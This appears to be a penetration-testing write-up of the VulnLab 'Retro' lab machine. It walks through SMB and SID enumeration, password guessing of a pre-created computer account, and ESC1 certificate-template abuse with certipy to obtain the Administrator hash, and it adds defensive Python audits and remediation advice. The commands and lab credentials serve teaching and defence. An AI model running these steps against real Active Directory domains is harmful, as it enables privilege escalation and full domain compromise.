Penetration Testing - Retro - VulnLab
Enrique A.
CRTP | PNPT | ARTA | Security Engineer with 9+ years of experience in network penetration testing, AD testing, Linux server testing and web application security testing.
Intro
This machine may be rated an "easy" challenge, but it still offers valuable insights for red teamers in real-world engagements. Its vulnerabilities, in particular the misconfigured Active Directory Certificate Services (ADCS) template, are a stark reminder of the importance of secure certificate management. The ease with which we exploited the certificate template to escalate privileges and gain access to the machine highlights the need for proper permissions and access controls in real-world environments. By understanding these weaknesses, red teams can better prepare for similar scenarios, and defenders are reminded of the value of thorough security checks and regular updates.
Running Nmap
└─$ sudo nmap -sV -sC -Pn 10.10.94.109 | tee nmapresults.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-24 22:43 EEST
Nmap scan report for 10.10.94.109
Host is up (0.044s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-24 19:43:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-24T19:44:35+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| DNS_Tree_Name: retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-05-24T19:43:55+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-05-23T19:21:56
|_Not valid after: 2024-11-22T19:21:56
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-24T19:43:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.03 seconds
Besides the open ports, Nmap shows that the domain is retro.vl and that the host is the domain controller DC.retro.vl (LDAP, Kerberos and DNS are all exposed).
Enumerating Shares
└─$ smbclient -L 10.10.94.109
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Notes Disk
SYSVOL Disk Logon server share
Trainees Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.94.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The following shares exist by default on every domain controller and will most likely not be readable by an anonymous user: ADMIN$, C$, IPC$, NETLOGON, SYSVOL.
I am seeing that the following shares could have some juicy info: Notes and Trainees.
┌──(kali㉿kali)-[~/Documents/VulnLab/Retro]
└─$ smbclient \\\\10.10.94.109\\Notes
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ^C
┌──(kali㉿kali)-[~/Documents/VulnLab/Retro]
└─$ smbclient \\\\10.10.94.109\\Trainees
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 24 00:58:43 2023
.. DHS 0 Wed Jul 26 12:54:14 2023
Important.txt A 288 Mon Jul 24 01:00:13 2023
6261499 blocks of size 4096. 2240556 blocks available
smb: \> get important.txt
getting file \important.txt of size 288 as important.txt (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \> exit
Downloaded the file "Important.txt". This is its content:
└─$ cat important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
This hints that there could be a user named trainee or trainees in the domain. We can verify this with impacket-lookupsid, or by brute-forcing our way in (in case the password is in our wordlist).
Impacket-LookupSid
This tool is part of the Impacket suite. It queries a Windows host over the LSARPC named pipe for the domain's Security Identifier (SID) and then brute-forces the RIDs appended to that SID to enumerate the user and group accounts that exist in the domain.
└─$ impacket-lookupsid [email protected] -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Brute forcing SIDs at 10.10.94.109
[*] StringBinding ncacn_np:10.10.94.109[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)
I will add all those users to a users.txt file. As the results show, trainee does exist, so instead of brute-forcing our way in we will password spray the server. To save some time, I extracted every word containing "trainee" from rockyou.txt into passwordlist.txt instead of running the whole file (in my first attempt I ran the whole rockyou.txt).
Earlier we were unable to access the "Notes" share; let's see if we can access it now with the trainee credentials:
└─$ smbclient \\\\10.10.94.109\\Notes -U trainee
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 24 01:03:16 2023
.. DHS 0 Wed Jul 26 12:54:14 2023
ToDo.txt A 248 Mon Jul 24 01:05:56 2023
6261499 blocks of size 4096. 2890576 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (1.3 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/Documents/VulnLab/Retro]
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
Re-checking the results obtained with impacket-lookupsid, we can see a BANKING$ account; a name ending in $ is a hint that it is a computer account:
We have already noticed that the IT team at this company is a little lazy and seems to follow the pattern of using the username as the password. We will try that with this account:
It works, but we get the message STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT. The password is correct (a wrong password would return STATUS_LOGON_FAILURE), but the account cannot be used to log on until its password has been changed:
The following article is super helpful and explains the STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT message properly: https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
As per the article, we need to put the following content in /etc/krb5.conf so that kpasswd can reach the KDC for the RETRO.VL realm:
[libdefaults]
    default_realm = RETRO.VL
    dns_lookup_realm = false
    ticket_lifetime = 24h
    renew_lifetime = 7d
    rdns = false
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true

[realms]
    RETRO.VL = {
        kdc = DC.RETRO.VL
        admin_server = DC.RETRO.VL
    }
Then we need to run the following (DC.RETRO.VL must resolve, for example through an /etc/hosts entry; kpasswd prompts for the current password and then for the new one):
kpasswd BANKING$
The password was changed properly to Password123!!!
creds: banking:Password123!!!
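The BANKING$ account is exactly the kind of object the ToDo note calls out: a computer account that was pre-created and never joined to a machine. The script below is an added example (it is not part of this walkthrough, nor code from the TrustedSec article) showing the audit a defender can run to find such accounts. It applies a heuristic to LDAP-style computer records: a WORKSTATION_TRUST_ACCOUNT whose pwdLastSet still matches whenCreated and whose logonCount is zero has never rotated its password and never logged on, which is what a pre-created account looks like until a machine joins with it. The records are constructed sample data shaped like the lookupsid output above; in practice they would come from an LDAP query of (objectClass=computer) for the attributes named here.

```python
"""Audit for pre-created, never-joined computer accounts (added example).

The entries below are constructed sample data, not real directory output.
"""
from datetime import datetime, timedelta, timezone

WORKSTATION_TRUST_ACCOUNT = 0x1000  # userAccountControl bit set on computer accounts
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """pwdLastSet is a Windows FILETIME: 100-ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Inverse of filetime_to_datetime, kept integer-exact for the sample data."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def is_pre_created_candidate(entry: dict, slack: timedelta = timedelta(minutes=5)) -> bool:
    """Heuristic: computer account whose password was set at object creation
    and never rotated, and which has never logged on.  A machine that really
    joined the domain logs on and rotates its password (30 days by default),
    so both signals move.  Matches deserve review: if the object was created
    with "assign as pre-Windows 2000 computer", its password is the lowercase
    account name (see the TrustedSec article linked above)."""
    uac = int(entry["userAccountControl"])
    if not uac & WORKSTATION_TRUST_ACCOUNT:
        return False                      # users, DCs (SERVER_TRUST_ACCOUNT) etc.
    if int(entry.get("logonCount", 0)) > 0:
        return False                      # something has authenticated as it
    pwd_last_set = filetime_to_datetime(int(entry["pwdLastSet"]))
    return abs(pwd_last_set - entry["whenCreated"]) <= slack


def find_pre_created(entries) -> list:
    """Return the sAMAccountNames that match the heuristic, sorted."""
    return sorted(e["sAMAccountName"] for e in entries if is_pre_created_candidate(e))


def _rec(name, uac, created, pwd_set, logons):
    """Build one LDAP-like record (constructed sample data)."""
    return {"sAMAccountName": name, "userAccountControl": uac, "whenCreated": created,
            "pwdLastSet": datetime_to_filetime(pwd_set), "logonCount": logons}


T0 = datetime(2023, 7, 23, 21, 0, tzinfo=timezone.utc)
SAMPLE_ENTRIES = [  # constructed; names loosely modelled on the lookupsid output above
    # DC$: SERVER_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION, active, password rotated
    _rec("DC$", 0x2000 | 0x80000, T0, T0 + timedelta(days=300), 4123),
    # BANKING$: password set two seconds after creation, never logged on
    _rec("BANKING$", 0x1000, T0 + timedelta(hours=1), T0 + timedelta(hours=1, seconds=2), 0),
    # WS01$: joined 30 days after creation and has been logging on since
    _rec("WS01$", 0x1000, T0 + timedelta(days=10), T0 + timedelta(days=40), 57),
    # jburley: ordinary user (NORMAL_ACCOUNT), out of scope for this check
    _rec("jburley", 0x200, T0, T0 + timedelta(days=100), 12),
]

if __name__ == "__main__":
    for name in find_pre_created(SAMPLE_ENTRIES):
        print(f"review pre-created computer account: {name}")
```

Anything the audit reports should be either joined to its machine, given a fresh random password, or deleted; the ToDo note in this box describes the last option as the intended cleanup.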
Pwning the box
I tried a lot of stuff from here: looked for users to Kerberoast, tried AS-REP roasting, tried logging in to the server with the trainee creds... nothing was working.
AD-CS misconfigurations
To start enumerating this, I tried certipy.
Note: This machine was turned off since I forgot to extend the time so from now on the IP is going to be: 10.10.69.30
Running Certipy with the newly obtained user Banking$:
./certipy find -u 'BANKING$' -p 'Password123!!!' -vulnerable -stdout -dc-ip 10.10.69.30
certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
The tool has discovered a vulnerability marked as ESC1 (the first of the ADCS domain escalation paths described in SpecterOps' "Certified Pre-Owned" research):
* The vulnerability is related to a specific certificate template named "RetroClients" which is enabled and allows client authentication.
* The template is configured to allow the "RETRO.VL\Domain Computers" group to enroll for certificates.
* The issue arises because the template allows the enrollee (the entity requesting the certificate) to supply the subject (the identity information) of the certificate.
* This means that any member of the "RETRO.VL\Domain Computers" group (in our case BANKING$) can request a certificate with arbitrary subject information, which could lead to impersonation attacks or other security issues.
In simpler terms, any domain computer can request a certificate carrying any identity, and since the template allows client authentication, that certificate can be used to authenticate as the chosen identity and gain unauthorized access to sensitive resources.
The potential impact of this vulnerability includes:
* Identity spoofing: An attacker could request a certificate with a fake identity, allowing them to impersonate another entity.
* Unauthorized access: An attacker could use the obtained certificate to access sensitive resources or systems, as the fake identity would be trusted by the system.
To remediate this vulnerability, the CA administrator should review the template settings: clear the "Enrollee Supplies Subject" setting so the CA builds the subject and SAN from the requester's AD object, restrict the enrollment permissions to only the entities that genuinely need the template, or require manager approval (or an authorized signature) for certificate requests.
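The four conditions listed above are exactly what certipy checks before it prints ESC1. As an added example (not certipy's own code), the script below parses a template block in the text format shown in the enumeration output above and applies those conditions, so a defender can triage a dump of templates and see which setting change closes the path. The LOW_PRIV_PRINCIPALS set is an assumption about which groups should count as "anyone can enroll"; the RetroClients block is quoted from the output above.

```python
"""ESC1 triage of a certipy 'find' template block (added example)."""

# Groups broad enough that Enroll rights for them mean "any account can enroll"
# (assumption; extend for your environment).
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}

# EKUs that let an issued certificate be used for domain logon.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}

# Quoted from the certipy output above; indented continuation lines carry
# additional principals exactly as certipy prints them.
RETRO_CLIENTS = r"""
    Template Name                       : RetroClients
    Enabled                             : True
    Client Authentication               : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
"""


def parse_template(text: str) -> dict:
    """Turn 'Key : Value' lines into {key: [values]}; a line without a colon
    that contains a backslash continues the previous key (one principal per
    line), while section headers such as 'Permissions' are ignored."""
    fields, last_key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if " : " in line:
            key, value = (part.strip() for part in line.split(" : ", 1))
            fields[key] = [value]
            last_key = key
        elif last_key and "\\" in line:
            fields[last_key].append(line)
    return fields


def flag(fields: dict, key: str) -> bool:
    return fields.get(key, ["False"])[0] == "True"


def esc1_enrollers(fields: dict) -> list:
    """Low-privileged principals able to abuse the template via ESC1, or []
    when any of the ESC1 preconditions is missing."""
    if not flag(fields, "Enabled"):
        return []
    if not flag(fields, "Enrollee Supplies Subject"):
        return []                     # subject/SAN come from AD: nothing to spoof
    if flag(fields, "Requires Manager Approval"):
        return []                     # a human gates every issuance
    if int(fields.get("Authorized Signatures Required", ["0"])[0]) > 0:
        return []                     # needs an enrollment-agent co-signature
    ekus = {e.strip() for v in fields.get("Extended Key Usage", []) for e in v.split(",")}
    logon_capable = flag(fields, "Any Purpose") or not ekus or bool(ekus & AUTH_EKUS)
    if not logon_capable:
        return []
    return [p for p in fields.get("Enrollment Rights", [])
            if p.split("\\", 1)[-1] in LOW_PRIV_PRINCIPALS]


def remediation(fields: dict) -> list:
    """Settings a CA admin would change to close the ESC1 path."""
    steps = []
    if flag(fields, "Enrollee Supplies Subject"):
        steps.append("Clear EnrolleeSuppliesSubject so the subject/SAN come from AD")
    if not flag(fields, "Requires Manager Approval"):
        steps.append("Enable manager approval for this template")
    if esc1_enrollers(fields):
        steps.append("Remove Enroll rights for: " + ", ".join(esc1_enrollers(fields)))
    return steps


def with_subject_from_ad(text: str) -> str:
    """Copy of a template dump with Enrollee Supplies Subject turned off."""
    return "\n".join(
        line.replace(": True", ": False") if line.strip().startswith("Enrollee Supplies Subject") else line
        for line in text.splitlines())


if __name__ == "__main__":
    tpl = parse_template(RETRO_CLIENTS)
    print("ESC1 enrollers:", esc1_enrollers(tpl))
    for step in remediation(tpl):
        print(" -", step)
    print("after hardening:", esc1_enrollers(parse_template(with_subject_from_ad(RETRO_CLIENTS))))
```

The same parser works on every template block certipy prints, so running esc1_enrollers over all of them gives the list of templates that share RetroClients' problem, and remediation shows why clearing the EnrolleeSuppliesSubject flag alone is enough to break the path even if the Enroll rights stay as they are.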
Let's Exploit it:
a) Let's request a certificate for the administrator.
The command (shown in the screenshot) uses certipy to request a certificate from the "retro-DC-CA" certificate authority. It authenticates as "BANKING$" with the password "Password123!!!" and requests a certificate from the "RetroClients" template with the "Administrator" user principal name (UPN) as the subject. The certificate uses a 4096-bit key because the template's minimum RSA key length is 4096 (see the certipy output above); a smaller key would be rejected. The target domain controller is "dc.retro.vl".
b) Let's authenticate with the PFX certificate and let's extract the administrator's hash:
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'retro.vl' -dc-ip 10.10.69.30
Now that we have the administrator's NT hash, we can log into the machine with Evil-WinRM using pass-the-hash.
With this we have completed the machine.
Conclusions
The Retro machine is a valuable learning experience for red teamers and security professionals. How easily the certificate template misconfiguration was discovered and exploited underscores the importance of thorough security checks and regular reviews in real-world environments. Templates that let the enrollee supply the subject, combined with broad enrollment permissions, are a warning for system administrators to review and update their ADCS settings.
This exercise demonstrated the potential consequences of neglecting these controls, and emphasizes the importance of ongoing vigilance and proactive security measures in preventing real-world attacks.